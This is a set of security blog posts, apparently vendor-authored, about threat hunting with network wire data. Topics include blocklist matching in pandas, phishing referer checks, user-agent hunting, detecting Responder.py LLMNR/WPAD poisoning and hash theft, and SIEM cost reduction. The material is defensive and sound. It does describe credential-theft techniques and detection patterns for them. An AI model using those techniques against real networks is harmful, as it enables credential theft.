This Jupyter notebook is available at https://github.com/donadatum/Python_Projects

This notebook demonstrates a simple way to see whether egress (outbound) transactions in wire data traffic are terminating at potentially malicious sites. The Python library pandas is used to compare the server IP addresses of exfiltrating transactions, drawn from a mock set of business IP addresses, against the IP addresses of known malicious sites.

To represent ‘known bad actors’, this example uses IP addresses that were reported within the last 48 hours as having run attacks on the Mail/Postfix service, taken from the Blocklist.de website: https://lists.blocklist.de/lists/mail.txt, downloaded Jan 9, 2018.

We can plot the distribution by using the .plot() method and specifying a horizontal bar chart. However, in this example it is not very useful because of the very high frequency of US IP addresses compared with other countries.

In [18]:

egress['Dest Country'].value_counts().plot(kind='barh')

Out[18]:

<matplotlib.axes._subplots.AxesSubplot at 0x118517780>

What if we wanted to look at the traffic from a particular country, such as France? We could use indexing combined with the pandas .isin() method, which is similar to the SQL IN operator. This produces a new DataFrame, ‘France’.

In [48]:

France = egress.loc[egress['Dest Country'].isin(['France'])]

In [49]:

France.head(2)

Out[49]:

(two rows, 1784 and 1787, shown transposed for readability)

                 1784                        1787
Time             50:13.4                     50:13.3
Record Type      Flow Audit                  Flow Audit
Source           Santa Clara Campus (Users)  Santa Clara Campus (Users)
Destination      External                    External
Source Location  Santa Clara Office          Santa Clara Office
Dest Location    Île-de-France               Île-de-France
Environment      EGRESS                      EGRESS
Dest Country     France                      France
Protocol         SSL:443                     SSL:443
Client Address   192.168.0.99                192.168.0.99
Client Bytes     126                         517
Server Address   74.121.138.36               74.121.138.36
Server Bytes     258                         2,916
Latency          NaN                         60.99
Process Time     57.071                      76.425

In [50]:

type(France)

Out[50]:

pandas.core.frame.DataFrame

Using the .describe() method we can see that there are 13 transactions – the same number identified using .value_counts() above. All of these transactions are from the Santa Clara Campus, the most frequent destination is Île-de-France, and 188.165.39.118 is the most common server address.
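That summary comes from .describe(include='all'); a minimal sketch with mock data (the values below are illustrative, not the notebook's actual 13 transactions):

```python
import pandas as pd

# Mock stand-in for the France subset described above
France = pd.DataFrame({
    'Source': ['Santa Clara Campus (Users)'] * 3,
    'Dest Location': ['Île-de-France', 'Île-de-France', 'Midi-Pyrénées'],
    'Server Address': ['188.165.39.118', '188.165.39.118', '74.121.138.36'],
})

# For object columns, describe() reports count, unique, top (the most
# frequent value) and freq (how often the top value occurs)
summary = France.describe(include='all')
print(summary.loc['count', 'Source'])        # number of transactions in the mock
print(summary.loc['top', 'Server Address'])  # most common server address
```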

The file ‘badips.csv’ contains a list of malicious IP addresses from the Blocklist.de website. We use pd.read_csv to bring the data into a pandas DataFrame. We specify that there is no header and assign the column name ‘Server Address’ to our one-column DataFrame.
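A sketch of that load, assuming ‘badips.csv’ is one IP per line with no header row (StringIO stands in for the file here):

```python
import pandas as pd
from io import StringIO

# Stand-in for 'badips.csv': one IP address per line, no header row
csv_text = StringIO("203.0.113.5\n198.51.100.7\n")

# header=None tells pandas the first line is data, not column names;
# names= assigns our single column its label
blocklist = pd.read_csv(csv_text, header=None, names=['Server Address'])
print(blocklist.columns.tolist())  # ['Server Address']
print(len(blocklist))              # 2
```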

Let’s add some fake data (like fake news but better!) to our blocklist to make sure the join is working. I have taken 10 IP addresses from the ‘egress’ DataFrame and created a file ‘fakebadservers.csv’. After loading this file using pd.read_csv, I concatenated this DataFrame to ‘blocklist’ to create ‘fakeblocklist’.
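The concatenation can be sketched with small inline frames standing in for the two CSV files:

```python
import pandas as pd

# Stand-ins for the loaded 'badips.csv' and 'fakebadservers.csv' frames
blocklist = pd.DataFrame({'Server Address': ['203.0.113.5', '198.51.100.7']})
fakebadservers = pd.DataFrame({'Server Address': ['74.121.138.36']})  # lifted from egress

# ignore_index=True renumbers the rows 0..n-1 instead of repeating indices
fakeblocklist = pd.concat([blocklist, fakebadservers], ignore_index=True)
print(len(fakeblocklist))  # 3
```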

Let’s try the merge again, only this time using ‘egress’ and ‘fakeblocklist’. This merge identifies 580 transactions associated with a known ‘bad actor’ – that is, the Server Address in ‘egress’ matches the Server Address in ‘fakeblocklist’.
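The merge itself is an inner join on ‘Server Address’ (tiny mock frames here, not the real 580-row result):

```python
import pandas as pd

egress = pd.DataFrame({
    'Server Address': ['74.121.138.36', '8.8.8.8', '74.121.138.36'],
    'Client Bytes': [126, 50, 517],
})
fakeblocklist = pd.DataFrame({'Server Address': ['74.121.138.36', '203.0.113.5']})

# An inner merge keeps only rows whose Server Address appears in both frames
hits = egress.merge(fakeblocklist, on='Server Address', how='inner')
print(len(hits))  # transactions matching a 'bad actor' address
```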

I was reading the Cisco mid-year security review and, once again, phishing is still staggeringly effective. One strategy for finding possible phishing campaigns is investigating HTTP referrer metrics in log files. This is not a bad way to look for phishing campaigns, but I wanted to take the time to cover an alternative to logs: investigating phishing attacks using ExtraHop’s Wire Data analytics.

Why wire data? I recently read a whitepaper by SolarWinds stating that a typical peak events-per-second rate on a web farm is around 1,100. Cast this across 6-8 business hours a day and you are looking at paying to store and index between 24 million and 32 million events, of which only a fraction is relevant when searching for suspect referrals. While I love logs and the use of them, the intelligence yield of most log solutions can be measured in the “thousandths” of a percent. In this post, I am going to walk through how to look for specific referrers that do not match what you expect to see and surface ONLY the actionable HTTP referrers that could be the result of phishing campaigns.

What do we want to do? We have a site called demo.example.com that logs users into our fictitious financial site. All users should be sent to a welcome page at demo.extrahop.com:8080 (yes, this is simplistic). We can either hash that HTTP referer (or referers) and look specifically for referers that do NOT match, or we can look for them explicitly. You may find that if you have a large number of HTTP referer sites, it looks MUCH cleaner to use hashes. For this example we want to look for two things:

Any HTTP referer that DOES NOT match the goodRefer array

Any “double-dotted” namespace that exists in the domArray array. (You may also want to check for “appended” or “double-dotted” namespace on line 7 as well in case you think internal users may get phished and you want to catch it on the EGRESS.)
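The actual trigger runs in ExtraHop's JavaScript trigger language; here is a hedged Python sketch of the same two checks, with goodRefer and domArray as hypothetical stand-ins for the arrays in the real trigger:

```python
# Hypothetical stand-ins for the arrays referenced above
goodRefer = ['http://demo.extrahop.com:8080/']
domArray = ['demo.example.com', 'extrahop.com']

def suspicious_referer(referer):
    # Check 1: flag any HTTP referer not in the approved list
    return referer not in goodRefer

def double_dotted(host):
    # Check 2: flag 'double-dotted' lookalike namespaces,
    # e.g. demo.example.com.evil.net embedding a real domain
    return any(dom in host and not host.endswith(dom) for dom in domArray)

print(suspicious_referer('http://phish.example.net/login'))  # True
print(double_dotted('demo.example.com.evil.net'))            # True
```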

Okay, we have some unauthorized HTTP referers and we have verified that they belong to a phishing site – now what do we do? You have several options should you observe unauthorized HTTP referers; those that I can think of initially are as follows:

If this is an external customer, you can log the credentials on the site and begin the process of alerting them.

Build in a redirect policy sending users sourcing from the offending referer to a page that alerts them that they have been phished.

Send the data to your poor-overburdened SIEM with some high INTEL-yield actionable logs!!

JSON.stringify the results and send them to the FS-ISAC and alert the rest of the community (and punk-bust the offenders that much faster!)

Below we are writing the data to our search appliance with a one-click link directly to the packets for digital evidence and further investigation (Click Image).

Conclusion: Phishing is still an effective vector for bad actors today, and the less friction we can put between the practitioner and the data they need, the better. Leveraging wire data for this task is considerably more agile than log-based solutions, and it delivers better data to your existing SIEM investment. Having an open platform like ExtraHop brings incident response, system owners, end users and customers, as well as the security community at large, into the solution. We have had stand-alone security for a long time, and in some situations that is as good as it gets, but where we can, I believe we should leverage the entire community. It is the gaps between us (users, customers, system owners and security) that are exploited as much as any vuln.

The threat hunting discipline continues to evolve in the security industry as organizations seek to become more proactive at finding threats to their infrastructure and engage in what is fast becoming a “hand-to-hand” combat situation in IT security. At the time of this article there were over 7,100 job postings on LinkedIn with the terms “Threat Hunting” or “Threat Intelligence”. The deluge of data we have taken on in the last ten years has resulted in significant noise and difficulty finding context within the myriad of disparate data sources that exist in an enterprise. In this post, I want to discuss how we can “cut out the middle-man” in our “quest for context”, gaining much-needed agility and speed and making our investments in mash-up technologies such as SIEMs, big data lakes and innovations like Sqrrl more efficient and less work.

The case for wire data: I tend to overuse the title above, but I think there is a significant case for leveraging wire data to gain context. In this specific hunt, I am going to search for non-standard user agents that I see on my network. UA hunting is relatively common, and while most hackers worth their salt will change the user agent name to hide, there is still a large number of solutions that do not – specifically IoT devices, millions of which will be purchased in the next few weeks and could be arbitrarily connected to your networks. The case for using wire data here is that, YES, you can log the user agent in your web logs and parse it out, write it to a SIEM or database, then query it to find those user agents you consider actionable. This is the “middle man” I am trying to eliminate. You may need to collect several terabytes of logs that need to be indexed (not always free) and stored (not always fast). Leveraging the ExtraHop wire data analytics platform, we parse non-standard User-Agents directly off the wire (no “middle man”) and bring context to the surface within milliseconds. This data can now be sent to your back-end SIEM, data lake or Sqrrl instance, delivering a much higher (a term I like to use) “intelligence yield”: in addition to populating dashboards, integrating with orchestration APIs and creating alerts and emails, you line your threat intelligence coffers with BETTER DATA! Better SIEM, better data lake, better back-end systems.

Below is a dashboard created specifically for the UA Hunt inspired by the threat hunting project that includes the following metrics:

Total number of unique user-agents per host (If your server has 7 unique user agents…it might have some malware or unauthorized software on it)

Unique IPs by non-standard User Agent.

Python and PowerShell user-agents (POSH is rapidly becoming the weapon of choice for a number of bad actors, if they use it to phone home….BUSTED!)

Geo-coded INGRESS and EGRESS (Example: if you don’t do business with Belarus, maybe you should look into the POSH user agent connected to it…)
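For readers who want to prototype these metrics offline, a rough pandas equivalent of the first and third dashboard metrics might look like this (mock data; the real dashboard is computed on the ExtraHop appliance):

```python
import pandas as pd

# Mock HTTP transactions; in practice these fields come off the wire
http = pd.DataFrame({
    'host':       ['web01', 'web01', 'web01', 'web02'],
    'user_agent': ['Mozilla/5.0', 'python-requests/2.18',
                   'WindowsPowerShell/5.1', 'Mozilla/5.0'],
    'client_ip':  ['10.0.0.5', '10.0.0.9', '10.0.0.9', '10.0.0.7'],
})

# Unique user-agents per host: a server with many distinct UAs is suspect
ua_per_host = http.groupby('host')['user_agent'].nunique()
print(ua_per_host['web01'])

# Python and PowerShell user-agents possibly phoning home
suspect = http[http['user_agent'].str.contains('python|PowerShell', case=False)]
print(len(suspect))
```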

Click Image

Drilling Down:You can also drill down into the specific conversations that were observed to get an idea of the client/server involved in the conversation as well as the request/response bytes (how big a file was sent) and URI.

Click Image

Clicking the bull’s eye on the left will take you to the packets that can then be downloaded and analyzed as well.

Click Image

Conclusion: The “data problem” is a big one, and solving it requires re-thinking how and where we do analytics. Back-end SIEMs and data lakes are in desperate need of better data, and while not everything will send Syslog messages or NetFlow data, the common thread among all of the devices we are trying to secure is wire data. If it has an IP address, we can monitor it and log it. Threading wire data analytics into your security strategy will add significant agility, shutter speed and a higher intelligence yield, making your entire security practice more effective. This is just one example of threat hunting with wire data and ExtraHop. Future posts will include the following hunts:

Detecting lateral movement via Explicit Credentials

Beacon Detection

Dynamic DNS

URI Analysis

Command and Control Detection

PSEXEC

External RDP

Webshells

Rogue Listeners

Threat hunting with wire data brings an entirely new data source to threat hunters and practitioners. Leveraging ExtraHop’s open solution, which includes integration with REST APIs, will make solving the “data problem” much easier and save you the time, cost and effort of parsing through terabytes or even petabytes of data to gain context.

I was listening to the Security Weekly podcast this week with Paul Asadoorian and John Strand, and I heard them talking about a product called Mazerunner that can detect Responder.py running on your network. I began to wonder if there was a way to detect Responder.py using the ExtraHop platform, so I downloaded a Kali OVA file and started looking at the traffic on the wire to see if I could make sense of it. What I found was that I was, in fact, able to consistently detect Responder.py traffic by looking at the LLMNR response packet itself coming from the Kali server.

What I observed: Over the last four years, I have spent my time pulling metadata and PCAPs at the core router or via some sort of SPAN aggregation like Gigamon or Arista. I can honestly say that, in the realm of protocols I come across, LLMNR (UDP 5355) is not one I see very often. It is possible this is due to the request normally being sent to a broadcast address (rarely the focus of my work), but seeing a response from an RFC1918 address was somewhat interesting. What I mean is, I would start up Responder on my Kali box, then see the request go to the broadcast address with the response sourcing from the Kali system in its own separate flow. An analogy would be if you asked a crowd “Where is TypoShare?” and someone wearing a trench coat, fedora and sunglasses said “I got ya’ TypoShare right here… just log in”. On the wire, this is easy to pick out: it does not respond over the ephemeral port but rather creates a new flow, so I can easily parse it out, with the Kali server appearing as the sender and the Windows domain workstation as the receiver. This alone does NOT make a malicious situation, but I want to start the process of gathering internal threat intelligence by keeping track of the system that responded to the LLMNR request.

Below is an example of a user “fat fingering” a share and having the lookup answered by the malicious Kali host (or anyone who basically runs “git clone” on Responder.py). Note below, you see the Kali system located at 192.168.0.11 answer the LLMNR request and provide name resolution for a file server/share that does not exist. In a large enterprise, it is not uncommon for someone to have a typo in a CIFS share name.

Below we see that we have observed someone answering an LLMNR/NBNS request

The next step is to write the system answering LLMNR requests to our session table so that we can look them up later. (cip and sip are variables for Client and Server IP respectively)
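Conceptually, the session table behaves like a key-value store keyed on IP. A Python analogue (not the actual ExtraHop trigger API) might look like:

```python
import time

# A Python analogue of the ExtraHop Session table: a key-value store
# mapping an IP that answered an LLMNR query to when we saw it
llmnr_responders = {}

def record_llmnr_responder(sip):
    # 'sip' is the server IP observed answering the LLMNR request
    llmnr_responders[sip] = time.time()

def seen_answering_llmnr(ip):
    # Later IOC checks (WPAD, CIFS, TDS) cross-reference this table
    return ip in llmnr_responders

record_llmnr_responder('192.168.0.11')
print(seen_answering_llmnr('192.168.0.11'))  # True
```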

ExtraHop IOC protocol threading:

So what exactly is happening here? For this test, I wanted to check a number of IOCs around SQL (TDS), web proxying and WPAD MITM hijacking, as well as hash stealing. To research this with logs, you would need to take the time to interrogate several different source log files and then try to mash them up. I am trying to do this within seconds and in flight, vs. after the events have been written to the SIEM. To do this, I use the ExtraHop Session table – a memcache key-value store – where I will park the system answering LLMNR queries and see if it shows up again when I match additional IOCs around CIFS, HTTP and TDS. (If that didn’t make sense, feel free to email me.)

So the next step is to check for any type of hijacking or tunneling that could occur as a result of someone running Responder.py on your network. First let’s have a look at HTTP tunneling (WPAD proxy hijacking).

HTTP WPAD Hijacking and Tunneling: Responder.py tries to hijack proxy sessions on browsers that are set to auto-discover proxy servers. In this case, I open my browser and the Kali system happily resolves WPAD for me and offers to be my proxy server for my web session; in addition to obtaining my hash, it may also prompt me for creds because, hey, clear text is always better than a hash.

How do we catch this? We look at the HTTP headers (in real time and at up to 40 Gbps) for the host WPAD, and if the result is true, we check the server IP against the IP address we put in the session table earlier. If that ALSO comes back true, then we flag it as a potentially actionable event. You may actually have a WPAD server in your environment, but I am comfortable saying that you likely don’t have a WPAD server that had previously been resolving LLMNR and/or NBNS name requests. That makes it suspicious and actionable; the goal here is to give CSIRT and the SOC BETTER data, not more data. Also, keep in mind, all of this is being interrogated in flight, so #LookMomNoSIEM!!! We can also send the data to a Syslog/SIEM workflow, which would likely be a welcome change: pre-parsed actionable intel sent to the SIEM vs. thousands of logs that must be sifted through to find actionable intelligence.
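The check can be sketched in Python (the real logic runs in an ExtraHop trigger; the host and IP values here are illustrative):

```python
# Populated earlier when we saw an IP answer LLMNR/NBNS queries
llmnr_responders = {'192.168.0.11'}

def wpad_hijack_suspected(http_host, sip):
    # Flag when the requested host is WPAD AND the server previously
    # answered LLMNR/NBNS -- a real WPAD server would not have done that
    return http_host.lower().startswith('wpad') and sip in llmnr_responders

print(wpad_hijack_suspected('wpad', '192.168.0.11'))  # True -> actionable
print(wpad_hijack_suspected('wpad', '10.1.1.5'))      # False -> likely a real WPAD server
```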

Likewise, with tunneling we do something similar: we look for the tunneling protocol consistent with proxy servers, and if we see it, we check the server IP against our LLMNR host from earlier (again, “sip” is a variable for the server IP). As I said before, you may have a proxy server, but likely not one that speaks LLMNR.

Below you see the results; here we are just logging them to the debug window, but we offer a number of ways to deal with IOC discovery that include, but are not limited to:

ServiceNow SEVONE ticket creation

Syslog to a SIEM based workflow or orchestration

REST API HTTP.post to a workflow or orchestration solution

Results:

SQL Server Credential Stealing: Responder.py can also listen for SQL Server browser requests. If someone installs SQL Server Management Studio on their system and then browses the network for a SQL Server, the Kali system running Responder will offer them a system. Most folks would be curious, likely click on it, and hand over their hash – likely a developer account with access to sensitive data – or they will offer it SQL credentials, and then the Kali server has their SQL-based creds. The first time I saw this, I imagined the horror of someone literally stealing hashes and creds while developers frustratedly offer their credentials to it. To combat this, we look for the SQL browsing protocol (udp:1434), and if we see it, as before, we check the server IP against the LLMNR responder that we parked in memcache (the Session table) to see if it matches. The caveat here is that I am not sure whether the SQL Browser actually uses LLMNR natively; I can say that I don’t see it very often when my head is in the packets at customer sites, and for my part, I have spent the last 5 years disabling this service on most SQL Servers for security reasons. At any rate, we can detect it with regularity, and many best practices advise disabling the SQL Browser service anyway, so if it shows up on your network with anything other than a broadcast address it could be an issue.

Below you see the trigger logic, where we check for the presence of the SQL browsing traffic and then check it against the IP we put in the session table.

Results: If we see a match, here we are warning inside the debug window, but in an implementation this would be sent to the SIEM, ServiceNow, an email alert or some form of orchestration to initiate an incident response.

Watching CIFS to see if hashes are being stolen: The last thing I want to show in this post is how to detect if someone tries to steal a hash using CIFS. (This can also be done using WPAD, but I will cover that in a later post.)

Observations: If an end user inadvertently types the wrong share name, either via Explorer or the “net use” command, normal name resolution will fail, causing the system to broadcast the request. The Responder.py system will answer this request via NBT-NS or LLMNR and prompt the user to type credentials (see graphic below). What I noticed on the wire is that there is a CIFS message for “SMB2_SESSION_SETUP: STATUS_ACCESS_DENIED” even though there wasn’t an official request – thus you see the access-denied message in the CIFS dialog box for the share \\1233\.

Casting the web: In preparing the trigger for this, I simply look for the error string and then, as we have seen previously, cross-check the IP address against those that have responded to LLMNR requests. In the event of a match, we write it out to the debug window, but depending on the customer we would run the normal incident response regimen.

Results:

Conclusion: It had been a long time since I had used any pen-testing tools. One thing I have to say, after 20 years of being a blue-teamer, is DAMN, the red team’s toys are SO MUCH cooler than ours!! This is not an attempt to one-up Security Weekly or Mazerunner; it was an interesting use case that I had not tried to tackle before with the platform, and it made for an interesting weekend project. If you are curious, this took a few hours to write once I got all of the systems in place (AD lab, Kali system). While we will write all of the code that we include with our specific security bundles, this is an example of how we have an open platform that, if desired, lets you engage in your own version of hand-to-hand combat with IOCs and bad actors. In this example, we have not had to set up any honeypots or misdirection; there are products that already do that. We are simply looking at the existing traffic and parsing out behavior that is indicative of an IOC. One of the challenges of doing this with logs or machine data is that if an IOC uses more than one protocol, then you likely have disparate logs/PCAPs for each protocol, and researching each data source is not agile at all. Using the Session table, we are able to park specific characteristics to be referenced in real time (in microseconds) and reused with other transactions, threading them together to create a picture within seconds – this is the true power being handed back to the blue team using our platform. With ExtraHop’s application inspection triggers you have the ability to engage directly with the wire to root out IOCs like LLMNR responses, SQL Browsers, SMBv1, expired/weak certificates, etc. This gives you the same agility that your adversaries have, allowing you to pivot your surveillance to what is relevant for your environment. Lastly, 192.168.0.11 (or any other RFC1918 address) will NEVER be in your STIX/TAXII feed or threat intelligence subscription.
Leveraging a surveillance platform like ExtraHop will position you to gather and build your own internal threat intelligence on your internal addresses. As most breaches begin or are sourced from the inside, the ability to create internal intelligence is critical.

I recently attended Black Hat, and one of the key narratives I overheard while meeting with INFOSEC practitioners was the need for better, smarter data. Attendees voiced frustration that current traditional tools deliver too much data, and that the time it takes to respond to an incident leaves attackers plenty of time to do their dirty work. Over the last year we have heard several criticisms of SIEM-based solutions and some of the limitations they have in dealing with today’s more agile threat landscape. My induction into security was based in SIEM, and I even ran a blog dedicated to Syslogs at http://Xen-trifuge.com where I detailed work I had done on my “Skunk” project. It stemmed from my desperate, but unheeded, plea to my former manager to purchase Splunk – “Can I have $20,000?” – being told “No”, then seeing Kiwi Syslog support SQL Server connections and making a second plea, “Can I have $300?”, which was accepted. SKUNK stood for SQL plus KIWI, to make it like Splunk. We used SQL, SSRS and KIWI’s ODBC connector with some parsing engines. As SIEM products go, Splunk was ABSOLUTELY my first love! I still know a few brilliant engineers who work there, and I have a great deal of respect for what that company has done to revolutionize security.

Over the last 5 years I had another epiphany: I was introduced by an SE named Matt Cauthorn to the concept of Wire Data Analytics. So why am I talking about a SIEM on a wire data analytics blog? Well, first, I feel like a lot of the criticisms of SIEMs aren’t necessarily 100% fair. My experience is that a SIEM is only as good as the data you put into it – and, even more importantly, the investment you make in back-end processes: how you parse, interpret and report so that you can “set context”. By “set context” I mean find actionable data, which is the subject of some intense criticism of SIEM products today.

In an article from Dark Reading citing a Ponemon institute study:

Today, those same products “barely work at all,” says Exabeam CMO Rick Caccia. Older systems aren’t built to capture credential or identity-based threats, hackers impersonating people on corporate networks, or rogue employees trying to steal data. A recent report by the Ponemon Institute, commissioned by Cyphort, discovered 76% of SIEM users across 559 businesses view SIEM as a strategically important security tool. However, only 48% were satisfied with the actionable intelligence their SIEMs generate.

With that, I’d like to start writing about how Wire Data Analytics with ExtraHop can set context in flight, reduce the cost of your SIEM investment, bring to bear an entirely new set of metrics and provide security teams with better data instead of more data.

Setting Context in Flight: ExtraHop’s wire data analytics capabilities enable you to set context in flight by interrogating the wire for specific events then applying logic to them in milliseconds so that your logs have considerably more value and a much higher intelligence yield.

Example: Auditing your PCI environment. You have a PCI environment that you want to set up network-based auditing for. The rules are as follows:

Alert on ANY external non-RFC1918 access and report it as an Egress Violation

Alert on any client or server based traffic that has not been pre-defined.

Using the SIEM only approach you must perform the following:

– Audit/log every single build-up and tear-down action, which could result in thousands and potentially millions of logs via Syslog or NetFlow
– Index and parse these logs
– Build/run back-end batch processes to root out the few suspect transactions from the, potentially, millions of logs you already have.

Now let’s consider what that would look like using an ExtraHop appliance:
– Create a rule that defines the appropriate communications
– Define acceptable client/server traffic (fill out the pre-defined application inspection trigger with the appropriate protocols)
– Tell the ExtraHop appliance to alert on any non-RFC1918 connection
– Send ONLY actionable intelligence to the SIEM, relieving both the CSIRT team and the back-end SIEM of the burden of indexing, parsing and sorting millions of logs.
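The non-RFC1918 test itself is simple; a Python sketch using the standard library (note that ipaddress.is_private matches RFC1918 plus a few other reserved ranges, such as loopback and link-local):

```python
import ipaddress

# Sketch of the egress rule: any destination outside private address
# space from the PCI segment is reported as an Egress Violation
def egress_violation(dest_ip):
    return not ipaddress.ip_address(dest_ip).is_private

print(egress_violation('8.8.8.8'))       # True  -> alert
print(egress_violation('192.168.10.4'))  # False -> internal traffic
```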

Click Image:

After setting the criteria, aka “casting the web”, we need only lie in wait for something to run across it. In the video below you will see examples of how we integrated with Splunk Cloud to “set context in flight” by sending ONLY logs that violated the criteria cast in the application inspection trigger above.

Now, instead of leaving the threat hunter to sort through thousands or millions of logs on the back end, we send data that is actionable because we set the rules before sending the Syslog message. As you can see below in the Splunk Cloud instance, every transaction sent to the SIEM is actionable, vs. the madness of sending thousands and thousands of logs every second to your SIEM. This makes the bill for indexing much cheaper, both from a licensing standpoint and from a hardware scaling standpoint. (Please watch the video on YouTube.)

New Concept: Intelligence Yield
In my time as the event correlation guru for my security team, one of the more frustrating things I ran into was the fact that I consistently needed about 30% of what was in a log file but would pay to store and/or index 100% of the data. When you use ExtraHop as a forwarder, you can pick and choose which parts of a log/payload you want to forward, and you can even customize the delimiter if you like. This means there is no leftover ASCII that needs to be stored and indexed. While this may not seem like a lot, at scale it can get expensive! Another way we provide better intelligence yield is, as in the example above, that we set the conditions under which we want to send Syslog data and ignore transactions that you may already be logging via whatever daemon you are running (Apache for HTTP, etc.). Why log HTTP network connections when you are already doing it in /var/log/apache/?

Possible Licensing Cost Savings: We actually had a scenario where a customer wanted to find out if there were excessive logins from a single client. The traffic was sending thousands of messages per minute to their SIEM. We looked at what was happening and did the following:

Kept a running ticker of the number of logins per client IP

Sent actionable data to the SIEM by sending just those client IPs that had more than 5 logins in a ten-minute period, reducing the message count from thousands per minute to between 5 and 7.
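The “running ticker” logic above can be sketched as a sliding-window counter per client IP (a Python illustration, not the production trigger; the window and threshold follow the numbers in the text):

```python
import time
from collections import defaultdict, deque

WINDOW = 600   # seconds: the ten-minute window
THRESHOLD = 5  # logins allowed in the window before we alert

logins = defaultdict(deque)  # client IP -> timestamps of recent logins

def record_login(client_ip, now=None):
    """Return True when this client exceeds THRESHOLD logins in WINDOW seconds."""
    now = time.time() if now is None else now
    q = logins[client_ip]
    q.append(now)
    # Drop timestamps that have aged out of the window
    while q and now - q[0] > WINDOW:
        q.popleft()
    return len(q) > THRESHOLD

# Six rapid logins from one client: the alert trips on the sixth
alerts = [record_login('10.0.0.8', now=t) for t in range(6)]
print(alerts)  # [False, False, False, False, False, True]
```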

In the fictitious scenario below, we use Splunk’s list price to show the difference in savings when you use ExtraHop as a forwarder and give the SIEM a break on processing messages. Keep in mind, while this is an overly simple example, there may be parts of your logging regimen where ExtraHop can provide in-flight context as well as a reduction in work, a reduction in licensing costs and an increase in the quality of the data you are receiving in your SIEM.

Scenario: Reducing your licensing costs as well as your Mean Time To “WTF!?” (MTTWTF). A customer has 500 clients, with each client node sending around 2,500 logs per minute (this is HARDLY out of the ordinary for a large enterprise). So with 500 clients sending 2,500 events per minute each, you are looking at 1.25 million events being indexed every minute.

Let’s say we use the SESSION_EXPIRE event: we send ONE event that has the client:server pair and a count of 500. In terms of “intelligence yield” it has the same value, but its overall volume impact is 0.04 percent (not four percent – “point zero four” percent). I would argue that the intelligence yield is actually higher, because you have delivered a level of context (the count) in the Syslog message vs. leaving it to some algorithm or batch process on the back end to deliver context. Five events… “meh”… 500 or 5,000 events… “WTF!”.

Our “MTTWTF” (Mean Time To “WHAT THE F***….”) is potentially MUCH faster.

So let’s take the overly simplistic view of a 50GB Splunk license (it will NOT be this simple for you, but I think most customers will get the value proposition here).

From Splunk’s Website:

A 50GB Splunk license is $38K annual, or $95K perpetual WITH $19K in support. If we can proportionally reduce the load on the SIEM product, you get the improved “MTTWTF” with a 2GB license, which would cost $1,500 annually, or $4,500 perpetual with $1,500 in maintenance.

As I said earlier, the view here is simplistic, but there are WITHOUT QUESTION logging regimens within customer environments that we can make more efficient using ExtraHop’s Wire Data Analytics and the Session table in place of logging every transaction. Also, please credit Splunk for publishing their sticker price.

This is not a knock on Splunk!

In this model you get the following:

On perpetual, roughly a 21x reduction in initial costs ($95K down to $4,500)

On annual, roughly a 25x reduction in initial costs ($38K down to $1,500)

Better Intelligence Yield

No forwarders or debugging levels to enable on the clients themselves.

Keep in mind, the larger the license, the smaller the savings will be, as Splunk rewards customers with larger GB licenses, but the point is: there are significant savings to be made in addition to having all-around better logs.

What’s on YOUR wire!!? When you leverage ExtraHop as a log forwarder, you get access to the best source of data on your network. Not only do you get access to it, but you get application inspection triggers that allow you to actively interact with it. With ExtraHop, unlike logging-based solutions, you are not dependent on someone to “opt in” to logging. You will NEVER have to go to another team and ask them to install forwarders or agents or send data to a remote system. If you have an IP address, you have already opted in, and if you have an IP address, there is NO opting out. If a system is rooted and /var/log is deleted… we will still log. If logging is shut off on a system, we, like closed-circuit TV, will continue surveillance and logging.

No agents, no logs….NO PROBLEM!
As previously stated, ExtraHop works from a mirror of the network, so if you have IoT devices that cannot log, we can log for them. If you have systems that are "certified" by a vendor and cannot be patched or have forwarders installed on them, not a problem, we can log for them. If you have a malicious Raspberry Pi plugged into the MDF and have ACL'd yourself off so you cannot be discovered…not a problem, we'll log everything you do!! (We also send a New Device alert when your MAC shows up.) The ExtraHop Discover appliance lets you "log the un-loggable", if that makes sense. Adopting a passive surveillance strategy is a perfect complement to any SIEM regimen.

Conclusion:
As I stated near the beginning of the post, INFOSEC teams do NOT need more data, they need better data. I am not saying you no longer need a SIEM, but I am absolutely saying that we need to send better data to our SIEM. Using ExtraHop can greatly enhance the agility and certainty of any CSIRT team or SOC. Evaluating transactions BEFORE you send them to the SIEM provides the level of certainty needed to take that next step toward orchestration and automation. As Threat Hunting continues to evolve as a discipline, no one will provide you a more intelligent and scalable web to cast as we move from playing whack-a-mole to a role more consistent with a trap-door spider. Several INFOSEC workflows are currently tied to the SIEM, and let's not throw the baby out with the bathwater. The SIEM can still serve us well, we just need to take steps to send it better data. There is no better source of data than the network, and there is no solution more capable of letting you mine data directly off the network than ExtraHop.

One of the more frustrating things about WannaCry, Petya and NotPetya is that they would have been made significantly less effective had organizations applied MS17-010. The fact that we still see SMBv1 is utterly staggering to me and my colleagues. Why is it that we live in a world with automation, vulnerability scanning, patching solutions and billions spent on security, yet our organizations are routinely compromised by what are, in many cases, patchable, or at least significantly mitigable, vulnerabilities? (Admittedly, Petya/NotPetya exploited LSASS.EXE as well, which is pretty brutal!)

There is another vector that I think is being exploited as digital threats become more organized (the 2017 Cisco Annual Security Report states that it is not uncommon for malicious hashes to be less than 24 hours old): organizational air gaps. While great for protecting integrity and accountability, I believe that organizational "air gaps" are part of the issue. There are numerous instances where security teams have warned system owners about vulnerabilities and were ignored, thus the sad attempt at an INFOSEC meme below.

How did we get here?
The meme above is meant to lend humor to what is a frustrating situation. I am certain that most system owners do not mock their CISO's office, nor are they unconcerned about their security. The issue is that, post-9/11, we started to form cyber security teams. While INFOSEC existed prior to 2001, its size and breadth were not nearly at the level they are today, where there are nearly as many INFOSEC roles as IT roles. The point is, we started the process of decoupling system owners from their own security. Cyber security teams started to form, and eventually (and probably justifiably) the "Office of the Chief Information Security Officer" (OCISO) was created and, in my opinion, this is where the new risk of organizational air gaps was born. While having the CISO report to the CEO does allow IT to be held accountable, and prevents a CIO from brow-beating the security team out of reporting security issues, it has created a difficult, albeit fixable, organizational challenge where the individuals responsible for addressing reported vulnerabilities have their agenda, budgeting and staffing levels set by an entirely different organization. The security apparatus is tasked with deriving a posture/strategy for the organization, and it can easily be received by the IT department as an unfunded mandate. I have worked both in security and within IT departments, and throughout my career, when I wasn't working in INFOSEC, the security of the systems under my purview was never a criterion in my performance evaluation. I was very security-conscious, but it had more to do with not wanting to be in the news or embarrassed. The time has come to evaluate cause and effect: systems will always have vulnerabilities and vendors will always have patches. The real vulnerability we need to address might be within our own organizations.

How do we fix this?
